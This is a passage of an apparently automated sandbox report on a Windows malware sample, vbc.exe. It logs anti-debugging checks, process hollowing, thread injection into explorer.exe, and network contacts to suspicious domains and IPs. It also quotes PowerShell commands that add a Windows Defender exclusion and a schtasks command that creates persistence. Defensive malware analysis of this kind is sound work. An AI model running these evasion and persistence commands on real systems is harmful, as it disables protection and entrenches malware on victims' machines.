Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01814120 mov eax, dword ptr fs:[00000030h]	8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01814120 mov eax, dword ptr fs:[00000030h]	8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01814120 mov eax, dword ptr fs:[00000030h]	8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01814120 mov eax, dword ptr fs:[00000030h]	8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01814120 mov ecx, dword ptr fs:[00000030h]	8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h]	8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C8D34 mov eax, dword ptr fs:[00000030h]	8_2_018C8D34
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182513A mov eax, dword ptr fs:[00000030h]	8_2_0182513A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182513A mov eax, dword ptr fs:[00000030h]	8_2_0182513A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h]	8_2_01824D3B
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h]	8_2_01824D3B
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h]	8_2_01824D3B
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01833D43 mov eax, dword ptr fs:[00000030h]	8_2_01833D43
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0181B944 mov eax, dword ptr fs:[00000030h]	8_2_0181B944
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0181B944 mov eax, dword ptr fs:[00000030h]	8_2_0181B944
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01873540 mov eax, dword ptr fs:[00000030h]	8_2_01873540
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01817D50 mov eax, dword ptr fs:[00000030h]	8_2_01817D50
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]	8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]	8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]	8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]	8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h]	8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0181C577 mov eax, dword ptr fs:[00000030h]	8_2_0181C577
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0181C577 mov eax, dword ptr fs:[00000030h]	8_2_0181C577
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01873884 mov eax, dword ptr fs:[00000030h]	8_2_01873884
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01873884 mov eax, dword ptr fs:[00000030h]	8_2_01873884
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018390AF mov eax, dword ptr fs:[00000030h]	8_2_018390AF
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182F0BF mov ecx, dword ptr fs:[00000030h]	8_2_0182F0BF
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182F0BF mov eax, dword ptr fs:[00000030h]	8_2_0182F0BF
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182F0BF mov eax, dword ptr fs:[00000030h]	8_2_0182F0BF
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188B8D0 mov ecx, dword ptr fs:[00000030h]	8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C8CD6 mov eax, dword ptr fs:[00000030h]	8_2_018C8CD6
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B14FB mov eax, dword ptr fs:[00000030h]	8_2_018B14FB
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C740D mov eax, dword ptr fs:[00000030h]	8_2_018C740D
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C740D mov eax, dword ptr fs:[00000030h]	8_2_018C740D
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C740D mov eax, dword ptr fs:[00000030h]	8_2_018C740D
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h]	8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01877016 mov eax, dword ptr fs:[00000030h]	8_2_01877016
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01877016 mov eax, dword ptr fs:[00000030h]	8_2_01877016
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01877016 mov eax, dword ptr fs:[00000030h]	8_2_01877016
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C4015 mov eax, dword ptr fs:[00000030h]	8_2_018C4015
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C4015 mov eax, dword ptr fs:[00000030h]	8_2_018C4015
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]	8_2_0180B02A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]	8_2_0180B02A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]	8_2_0180B02A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h]	8_2_0180B02A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182BC2C mov eax, dword ptr fs:[00000030h]	8_2_0182BC2C
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188C450 mov eax, dword ptr fs:[00000030h]	8_2_0188C450
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188C450 mov eax, dword ptr fs:[00000030h]	8_2_0188C450
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0181746D mov eax, dword ptr fs:[00000030h]	8_2_0181746D
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B2073 mov eax, dword ptr fs:[00000030h]	8_2_018B2073
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C1074 mov eax, dword ptr fs:[00000030h]	8_2_018C1074
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F9080 mov eax, dword ptr fs:[00000030h]	8_2_017F9080
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B138A mov eax, dword ptr fs:[00000030h]	8_2_018B138A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01801B8F mov eax, dword ptr fs:[00000030h]	8_2_01801B8F
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_01801B8F mov eax, dword ptr fs:[00000030h]	8_2_01801B8F
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FDB60 mov ecx, dword ptr fs:[00000030h]	8_2_017FDB60
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FF358 mov eax, dword ptr fs:[00000030h]	8_2_017FF358
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C5BA5 mov eax, dword ptr fs:[00000030h]	8_2_018C5BA5
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FDB40 mov eax, dword ptr fs:[00000030h]	8_2_017FDB40
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F4F2E mov eax, dword ptr fs:[00000030h]	8_2_017F4F2E
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F4F2E mov eax, dword ptr fs:[00000030h]	8_2_017F4F2E
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C070D mov eax, dword ptr fs:[00000030h]	8_2_018C070D
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C070D mov eax, dword ptr fs:[00000030h]	8_2_018C070D
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018B131B mov eax, dword ptr fs:[00000030h]	8_2_018B131B
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188FF10 mov eax, dword ptr fs:[00000030h]	8_2_0188FF10
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188FF10 mov eax, dword ptr fs:[00000030h]	8_2_0188FF10
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182E730 mov eax, dword ptr fs:[00000030h]	8_2_0182E730
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0180EF40 mov eax, dword ptr fs:[00000030h]	8_2_0180EF40
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C8B58 mov eax, dword ptr fs:[00000030h]	8_2_018C8B58
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C8F6A mov eax, dword ptr fs:[00000030h]	8_2_018C8F6A
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0188FE87 mov eax, dword ptr fs:[00000030h]	8_2_0188FE87
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182D294 mov eax, dword ptr fs:[00000030h]	8_2_0182D294
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0182D294 mov eax, dword ptr fs:[00000030h]	8_2_0182D294
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018746A7 mov eax, dword ptr fs:[00000030h]	8_2_018746A7
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h]	8_2_018C0EA5
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h]	8_2_018C0EA5
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h]	8_2_018C0EA5
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]	8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]	8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]	8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]	8_2_017F9240
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018AFEC0 mov eax, dword ptr fs:[00000030h]	8_2_018AFEC0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018236CC mov eax, dword ptr fs:[00000030h]	8_2_018236CC
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018C8ED6 mov eax, dword ptr fs:[00000030h]	8_2_018C8ED6
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FE620 mov eax, dword ptr fs:[00000030h]	8_2_017FE620
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018216E0 mov ecx, dword ptr fs:[00000030h]	8_2_018216E0
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018076E2 mov eax, dword ptr fs:[00000030h]	8_2_018076E2
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h]	8_2_017FC600
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h]	8_2_017FC600
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h]	8_2_017FC600
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018AFE3F mov eax, dword ptr fs:[00000030h]	8_2_018AFE3F
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]	8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]	8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]	8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]	8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]	8_2_017F52A5
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018AB260 mov eax, dword ptr fs:[00000030h]	8_2_018AB260
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_018AB260 mov eax, dword ptr fs:[00000030h]	8_2_018AB260
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0180766D mov eax, dword ptr fs:[00000030h]	8_2_0180766D
Source: C:\Users\user\Desktop\vbc.exe	Code function: 8_2_0183927A mov eax, dword ptr fs:[00000030h]	8_2_0183927A

Source: C:\Users\user\Desktop\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe

Code function: 8_2_00409B40 LdrLoadDll,

8_2_00409B40

Source: C:\Users\user\Desktop\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.miabellavita.com
Source: C:\Windows\explorer.exe	Domain query: www.joye.club
Source: C:\Windows\explorer.exe	Domain query: www.maikoufarm.com
Source: C:\Windows\explorer.exe	Domain query: www.mmj0115.xyz
Source: C:\Windows\explorer.exe	Network Connect: 44.227.65.245 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.septemberstockevent200.com
Source: C:\Windows\explorer.exe	Domain query: www.watermountsteam.top
Source: C:\Windows\explorer.exe	Network Connect: 104.21.4.114 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.yungbredda.com
Source: C:\Windows\explorer.exe	Domain query: www.leewaysvcs.com
Source: C:\Windows\explorer.exe	Domain query: www.sharpstead.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 118.27.122.222 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.188.247 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 101.132.116.91 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\vbc.exe

Section unmapped: C:\Windows\SysWOW64\help.exe base address: 120000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\vbc.exe	Thread register set: target process: 3292	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Thread register set: target process: 3292	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Thread register set: target process: 3292	Jump to behavior

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe			Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe	Jump to behavior

Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 0000000B.00000000.305520960.0000000005F40000.00000004.00000001.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.266771972.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Source: C:\Users\user\Desktop\vbc.exe	Queries volume information: C:\Users\user\Desktop\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
